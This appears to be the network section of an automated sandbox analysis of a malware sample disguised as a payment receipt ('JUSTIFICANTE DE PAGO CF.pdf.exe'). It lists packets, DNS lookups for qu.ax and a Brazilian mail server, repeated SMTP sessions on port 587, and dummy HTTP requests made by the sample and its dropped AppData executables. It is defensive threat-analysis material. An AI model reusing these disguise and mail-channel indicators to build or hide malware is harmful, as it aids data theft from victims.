                                                                              Feb 21, 2024 21:09:31.020793915 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.642617941 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.642647028 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.642664909 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.643366098 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.643407106 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.643445969 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.643455982 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.643481970 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.643503904 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.643553972 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.643640041 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.643651009 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.643733025 CET4434973345.83.31.187192.168.2.5
                                                                              Feb 21, 2024 21:09:31.644831896 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.646042109 CET49733443192.168.2.545.83.31.187
                                                                              Feb 21, 2024 21:09:31.697247982 CET4973280192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:31.698376894 CET4973480192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:31.784710884 CET804973293.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:09:31.784806967 CET4973280192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:31.785666943 CET804973493.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:09:31.785856962 CET4973480192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:31.785970926 CET4973480192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:31.873548985 CET804973493.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:09:31.873991966 CET804973493.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:09:31.874003887 CET804973493.184.216.34192.168.2.5
                                                                              Feb 21, 2024 21:09:31.874212027 CET4973480192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:32.321244955 CET4973480192.168.2.593.184.216.34
                                                                              Feb 21, 2024 21:09:33.229746103 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:33.426254034 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:33.426326036 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:33.629554987 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:33.629923105 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:33.826782942 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:33.829037905 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.027642012 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.032692909 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.243825912 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.243863106 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.243874073 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.243887901 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.243947029 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.243947983 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.245425940 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.247076035 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.443599939 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.463968039 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.660788059 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.661195040 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:34.858198881 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:34.858665943 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.066811085 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.067312002 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.263463974 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.264244080 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.469202042 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.469439983 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.665977955 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.666790962 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.666868925 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.666908979 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.666944027 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:35.862826109 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.862847090 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.862903118 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.862914085 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.886693954 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:35.926717997 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:36.162916899 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:36.535911083 CET58749735191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:36.541100979 CET49735587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:36.543262005 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:36.739094973 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:36.739202023 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.145499945 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.145700932 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.342232943 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.387487888 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.418860912 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.616910934 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.617353916 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.825069904 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.825145960 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.825177908 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.825227022 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.825253010 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.825290918 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:37.826997042 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:37.837656021 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:38.034272909 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:38.090496063 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:38.957914114 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:39.154699087 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:39.156677008 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:39.353605032 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:39.353948116 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:39.561652899 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:39.561888933 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:39.758111000 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:39.758390903 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:39.980176926 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:39.980426073 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.176748037 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.177350998 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177503109 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177558899 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177611113 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177675962 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177716970 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177757978 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177804947 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177839041 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.177876949 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:09:40.373473883 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.373493910 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.373507023 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374356985 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374408960 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374420881 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374430895 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374442101 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374540091 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.374552011 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.413280964 CET58749736191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:09:40.465617895 CET49736587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:10:32.072593927 CET49709587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:10:32.372061014 CET49709587192.168.2.5191.252.141.106
                                                                              Feb 21, 2024 21:10:32.609987974 CET58749709191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:10:32.984625101 CET58749709191.252.141.106192.168.2.5
                                                                              Feb 21, 2024 21:10:32.985430002 CET49709587192.168.2.5191.252.141.106
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 21, 2024 21:08:47.990926981 CET | 63443 | 53 | 192.168.2.5 | 1.1.1.1
Feb 21, 2024 21:08:48.079638004 CET | 53 | 63443 | 1.1.1.1 | 192.168.2.5
Feb 21, 2024 21:08:48.468378067 CET | 56757 | 53 | 192.168.2.5 | 1.1.1.1
Feb 21, 2024 21:08:48.646100044 CET | 53 | 56757 | 1.1.1.1 | 192.168.2.5
Feb 21, 2024 21:08:51.865258932 CET | 62445 | 53 | 192.168.2.5 | 1.1.1.1
Feb 21, 2024 21:08:52.755491018 CET | 53 | 62445 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 21, 2024 21:08:47.990926981 CET | 192.168.2.5 | 1.1.1.1 | 0x49bb | Standard query (0) | www.example.com | A (IP address) | IN (0x0001) | false
Feb 21, 2024 21:08:48.468378067 CET | 192.168.2.5 | 1.1.1.1 | 0xf919 | Standard query (0) | qu.ax | A (IP address) | IN (0x0001) | false
Feb 21, 2024 21:08:51.865258932 CET | 192.168.2.5 | 1.1.1.1 | 0x677c | Standard query (0) | mail.wassadadvogados.com.br | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 21, 2024 21:08:48.079638004 CET | 1.1.1.1 | 192.168.2.5 | 0x49bb | No error (0) | www.example.com |  | 93.184.216.34 | A (IP address) | IN (0x0001) | false
Feb 21, 2024 21:08:48.646100044 CET | 1.1.1.1 | 192.168.2.5 | 0xf919 | No error (0) | qu.ax |  | 45.83.31.187 | A (IP address) | IN (0x0001) | false
Feb 21, 2024 21:08:52.755491018 CET | 1.1.1.1 | 192.168.2.5 | 0x677c | No error (0) | mail.wassadadvogados.com.br | wassadadvogados.com.br |  | CNAME (Canonical name) | IN (0x0001) | false
Feb 21, 2024 21:08:52.755491018 CET | 1.1.1.1 | 192.168.2.5 | 0x677c | No error (0) | wassadadvogados.com.br |  | 191.252.141.106 | A (IP address) | IN (0x0001) | false
                                                                              • qu.ax
                                                                              • www.example.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 93.184.216.34 | 80 | 2360 | C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe

Timestamp | Bytes transferred | Direction | Data
Feb 21, 2024 21:08:48.185903072 CET | 172 | OUT | POST /recepticle.aspx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: www.example.com
Content-Length: 25
Expect: 100-continue
Connection: Keep-Alive
Feb 21, 2024 21:08:48.273284912 CET | 25 | IN | HTTP/1.1 100 Continue
Feb 21, 2024 21:08:48.273722887 CET | 25 | OUT | Data Raw: 74 68 69 6e 67 31 3d 68 65 6c 6c 6f 26 74 68 69 6e 67 32 3d 77 6f 72 6c 64
Data Ascii: thing1=hello&thing2=world
Feb 21, 2024 21:08:48.425983906 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:08:48 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:08:48 GMT
                                                                              Server: EOS (vny/0451)
                                                                              Content-Length: 433
                                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49707 | 93.184.216.34 | 80 | 2360 | C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe

Timestamp | Bytes transferred | Direction | Data
Feb 21, 2024 21:08:50.142678022 CET | 56 | OUT | GET /recepticle.aspx HTTP/1.1
Host: www.example.com
Feb 21, 2024 21:08:50.230633974 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                              Accept-Ranges: bytes
                                                                              Age: 366073
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:08:50 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:08:50 GMT
                                                                              Last-Modified: Sat, 17 Feb 2024 14:27:37 GMT
                                                                              Server: ECS (nyb/1D29)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: 404-HIT
                                                                              Content-Length: 1256
                                                                              Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
                                                                              Feb 21, 2024 21:08:50.230674982 CET | 312 | IN | Data Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69
                                                                              Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              2 | 192.168.2.5 | 49710 | 93.184.216.34 | 80 | 7128 | C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Feb 21, 2024 21:09:04.194528103 CET | 172 | OUT | POST /recepticle.aspx HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: www.example.com
                                                                              Content-Length: 25
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2024 21:09:04.282198906 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                              Feb 21, 2024 21:09:04.308711052 CET | 25 | OUT | Data Raw: 74 68 69 6e 67 31 3d 68 65 6c 6c 6f 26 74 68 69 6e 67 32 3d 77 6f 72 6c 64
                                                                              Data Ascii: thing1=hello&thing2=world
                                                                              Feb 21, 2024 21:09:04.462300062 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:04 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:04 GMT
                                                                              Server: EOS (vny/0451)
                                                                              Content-Length: 433
                                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              3 | 192.168.2.5 | 49712 | 93.184.216.34 | 80 | 7128 | C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Feb 21, 2024 21:09:06.067775011 CET | 56 | OUT | GET /recepticle.aspx HTTP/1.1
                                                                              Host: www.example.com
                                                                              Feb 21, 2024 21:09:06.155781984 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                              Accept-Ranges: bytes
                                                                              Age: 366089
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:06 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:06 GMT
                                                                              Last-Modified: Sat, 17 Feb 2024 14:27:37 GMT
                                                                              Server: ECS (nyb/1D29)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: 404-HIT
                                                                              Content-Length: 1256
                                                                              Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
                                                                              Feb 21, 2024 21:09:06.155807972 CET | 312 | IN | Data Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69
                                                                              Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              4 | 192.168.2.5 | 49722 | 93.184.216.34 | 80 | 7056 | C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Feb 21, 2024 21:09:12.584539890 CET | 172 | OUT | POST /recepticle.aspx HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: www.example.com
                                                                              Content-Length: 25
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2024 21:09:12.672023058 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                              Feb 21, 2024 21:09:12.672467947 CET | 25 | OUT | Data Raw: 74 68 69 6e 67 31 3d 68 65 6c 6c 6f 26 74 68 69 6e 67 32 3d 77 6f 72 6c 64
                                                                              Data Ascii: thing1=hello&thing2=world
                                                                              Feb 21, 2024 21:09:12.825601101 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:12 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:12 GMT
                                                                              Server: EOS (vny/0451)
                                                                              Content-Length: 433
                                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              5 | 192.168.2.5 | 49724 | 93.184.216.34 | 80 | 7056 | C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Feb 21, 2024 21:09:14.209173918 CET | 56 | OUT | GET /recepticle.aspx HTTP/1.1
                                                                              Host: www.example.com
                                                                              Feb 21, 2024 21:09:14.297058105 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                              Accept-Ranges: bytes
                                                                              Age: 366097
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:14 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:14 GMT
                                                                              Last-Modified: Sat, 17 Feb 2024 14:27:37 GMT
                                                                              Server: ECS (nyb/1D29)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: 404-HIT
                                                                              Content-Length: 1256
                                                                              Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
                                                                              Feb 21, 2024 21:09:14.297072887 CET | 312 | IN | Data Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69
                                                                              Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              6 | 192.168.2.5 | 49727 | 93.184.216.34 | 80 | 6472 | C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Feb 21, 2024 21:09:21.959144115 CET | 172 | OUT | POST /recepticle.aspx HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: www.example.com
                                                                              Content-Length: 25
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2024 21:09:22.046473980 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                              Feb 21, 2024 21:09:22.046825886 CET | 25 | OUT | Data Raw: 74 68 69 6e 67 31 3d 68 65 6c 6c 6f 26 74 68 69 6e 67 32 3d 77 6f 72 6c 64
                                                                              Data Ascii: thing1=hello&thing2=world
                                                                              Feb 21, 2024 21:09:22.198987961 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:22 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:22 GMT
                                                                              Server: EOS (vny/0451)
                                                                              Content-Length: 433
                                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              7 | 192.168.2.5 | 49729 | 93.184.216.34 | 80 | 6472 | C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Feb 21, 2024 21:09:23.649080038 CET | 56 | OUT | GET /recepticle.aspx HTTP/1.1
                                                                              Host: www.example.com
                                                                              Feb 21, 2024 21:09:23.736970901 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                              Accept-Ranges: bytes
                                                                              Age: 366106
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:23 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:23 GMT
                                                                              Last-Modified: Sat, 17 Feb 2024 14:27:37 GMT
                                                                              Server: ECS (nyb/1D29)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: 404-HIT
                                                                              Content-Length: 1256
                                                                              Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
                                                                              Feb 21, 2024 21:09:23.737008095 CET | 312 | IN | Data Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69
